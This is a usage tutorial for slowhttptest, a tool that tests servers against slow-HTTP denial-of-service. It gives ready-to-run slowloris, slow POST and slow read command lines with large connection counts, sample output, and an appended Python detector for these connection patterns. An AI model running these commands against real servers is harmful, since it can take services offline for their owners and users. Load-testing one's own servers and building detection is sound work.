slowhttptest

An application-layer DoS attack testing tool.
It supports the following:
 * slowloris, Slow HTTP POST, Slow Read attack (concurrent connections consumption)
 * Apache Range Header attack (memory and CPU consumption, CVE-2011-3192)
Reference:
https://code.google.com/p/slowhttptest/
Slow Read DoS attack explained:
http://www.xlgps.com/article/53972.html

 

Download

https://code.google.com/p/slowhttptest/downloads/list

Installation

$ tar -xzvf slowhttptest-x.x.tar.gz
$ cd slowhttptest-x.x
$ ./configure --prefix=<PREFIX>
$ make
$ sudo make install

Test your tool

$ <PREFIX>/bin/slowhttptest

 


Basic attack

1. Choose attack type

-B: enables slow POST test
-H: enables slow headers test
-X: enables slow read test
-R: enables range test

2. Choose target

-u <URL>: target URL, format is http[s]://<host[:port]>

ex:
-u https://myseceureserverl

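3. Choose basic parameters

-c <number>: number of connections, limited to 65539, default 50
-r <number>: connection rate (connections per second), default 50
ps: some Linux systems limit the number of connections to 4000 on their own. If the tool asks for more than that, it still uses only 4000 connections unless the Linux limit is lifted.
ex: ulimit -n 65535

Reference: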
https://github.com/shekyan/slowhttptest/wiki/InstallationAndUsage

 

Optional parameters for information

-p <sec>: timeout in seconds to wait for an HTTP response on the probe connection, after which the server is considered inaccessible, default 5

-g: generate statistics in CSV and HTML formats, pattern is slow_xxx.csv/html, where xxx is the time and date

-o <string> ex: -o my_body_stats

-v <level>
level 1: default, shows the status of connections every 5 seconds
level 4: full traffic dump

 

Other parameters

-l <sec>: test duration in seconds, default 240
-t <custom string>: custom verb to use, ex: -t FAKEVERB

Proxy server

-d <proxy host>: for directing all traffic through a web proxy
-e <proxy host>: for directing only probe traffic through a web proxy

 


Advanced options: POST or header attack

Interval between data sends

-i <sec>: interval between follow up data per connection, default 10

ex:
-i 100
Interval between follow up data 100 seconds

Amount of body data sent at a time

-x <byte>: max length of follow up data

ex:
-x 1 or -x 2
Test parameters: follow up data max size: 8
-x 3
Test parameters: follow up data max size: 10
-x 24
Test parameters: follow up data max size: 52

ps:
In header mode the final value is the input value * 2 + 4.
In POST mode the final value is the input value * 2 + 2.
ps:
The value actually used after negotiating with the target will still change; this value is for reference only.

 

Specify the POST body length

-s <byte>: Content-Length header value, default 4096, if -B specified
ps: this does not apply to header mode, because by default it keeps sending (that is, it never sends the terminating \r\n).

 

POST and header attack examples

message body mode (post)
ex:
slowhttptest -c 1000 -B -i 10 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserverl -x 10 -p 3

slowloris mode (header)
ex:
slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://myseceureserver -x 24 -p 3

 


Advanced options: read attack

Specify the random range of the window size

-w <byte>: start of the range (in bytes) the advertised window size is picked from
-y <byte>: end of the range (in bytes) the advertised window size is picked from

ex:
-w 10 -y 20 produces the following:
receive window range: 10 - 20

ps: after negotiation with the target, the final value will be different.

-n <sec>: interval in seconds between read operations from the receive buffer, default=1
-z <bytes>: bytes to read from the receive buffer with a single read() operation, default=5

ex:
-z 32 -n 5 produces the following:
read rate from receive buffer: 32 bytes / 5 sec

-k <number>: pipeline factor, the number of times to repeat the request in the same connection for the slow read test if the server supports HTTP pipelining.
The server must support this feature first.

ex:
-k 10
Test parameters: Pipeline factor 10

ps:
Pipelined connections: multiple HTTP requests are sent on a single connection. HTTP 1.1 allows pipelining on persistent connections: several requests are sent before the responses come back, which can greatly improve performance in high-latency network environments.
Reference: https://ihower.tw/blog/archives/1517

 

Read attack examples

slow read
ex:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver -p 5 -l 350

slow read mode with probing through proxy
ex:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver -p 5 -l 350 -e x.x.x.x:8080

 


The attack output looks like this:

SLOW BODY

Test parameters
Test type SLOW BODY
Number of connections 6000
Verb POST
Content-Length header value 4096
Extra data max length 14
Interval between follow up data 30 seconds
Connections per seconds 200
Timeout for probe connection 3
Target test duration 240 seconds
Using proxy no proxy

SLOW HEADERS

Test parameters
Test type SLOW HEADERS
Number of connections 6000
Verb GET
Content-Length header value 4096
Extra data max length 52
Interval between follow up data 10 seconds
Connections per seconds 200
Timeout for probe connection 3
Target test duration 240 seconds
Using proxy no proxy

SLOW READ

Test parameters
Test type SLOW READ
Number of connections 6000
Receive window range 5 - 15
Pipeline factor 1
Read rate from receive buffer 10 bytes / 3 sec
Connections per seconds 200
Timeout for probe connection 10
Target test duration 240 seconds
Using proxy no proxy
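
On the server side, each of the three test types above leaves a distinct per-connection signature: headers that never terminate, a request body arriving far below its declared Content-Length, or a response the client barely reads. The following is an added example, not code from slowhttptest or from the original post; the telemetry fields, thresholds and sample records are assumptions constructed for illustration.

```python
from dataclasses import dataclass
from typing import Optional

# Assumed server-side limits (tune per service); not slowhttptest settings.
HEADER_TIMEOUT_S = 20    # request headers must be complete within this time
MIN_RATE = 500.0         # bytes/sec floor for request bodies and response reads
GRACE_S = 10             # do not rate-check requests younger than this

@dataclass
class Conn:
    """Snapshot of one in-flight request (hypothetical telemetry fields)."""
    src: str
    req_age_s: float      # seconds since the current request started
    headers_done: bool    # terminating blank line (\r\n\r\n) received
    content_length: int   # declared Content-Length, 0 if none
    body_bytes: int       # request body bytes received so far
    resp_pending: int     # response bytes queued, not yet read by the client
    resp_read: int        # response bytes the client has read so far

def classify(c: Conn) -> Optional[str]:
    """Return the slow-HTTP pattern this connection matches, or None."""
    if not c.headers_done:
        return "slow_headers" if c.req_age_s > HEADER_TIMEOUT_S else None
    if c.req_age_s < GRACE_S:
        return None
    if c.body_bytes < c.content_length:
        return "slow_body" if c.body_bytes / c.req_age_s < MIN_RATE else None
    if c.resp_pending > 0 and c.resp_read / c.req_age_s < MIN_RATE:
        return "slow_read"
    return None

def summarize(conns):
    """Count flagged connections per source address and pattern."""
    counts = {}
    for c in conns:
        label = classify(c)
        if label:
            per_src = counts.setdefault(c.src, {})
            per_src[label] = per_src.get(label, 0) + 1
    return counts

# Constructed sample, 60 s into a test like the three shown above.
SAMPLE = [
    Conn("192.0.2.10", 60, False, 0, 0, 0, 0),         # headers never end
    Conn("192.0.2.10", 60, True, 4096, 28, 0, 0),      # 14 bytes per 30 s
    Conn("192.0.2.10", 60, True, 0, 0, 50000, 200),    # 10 bytes per 3 s
    Conn("198.51.100.7", 60, True, 4096, 4096, 0, 0),  # finished upload
    Conn("198.51.100.7", 2, False, 0, 0, 0, 0),        # new, still in grace
]
```

Running summarize(SAMPLE) attributes all three patterns to the single test source and leaves the ordinary client unflagged.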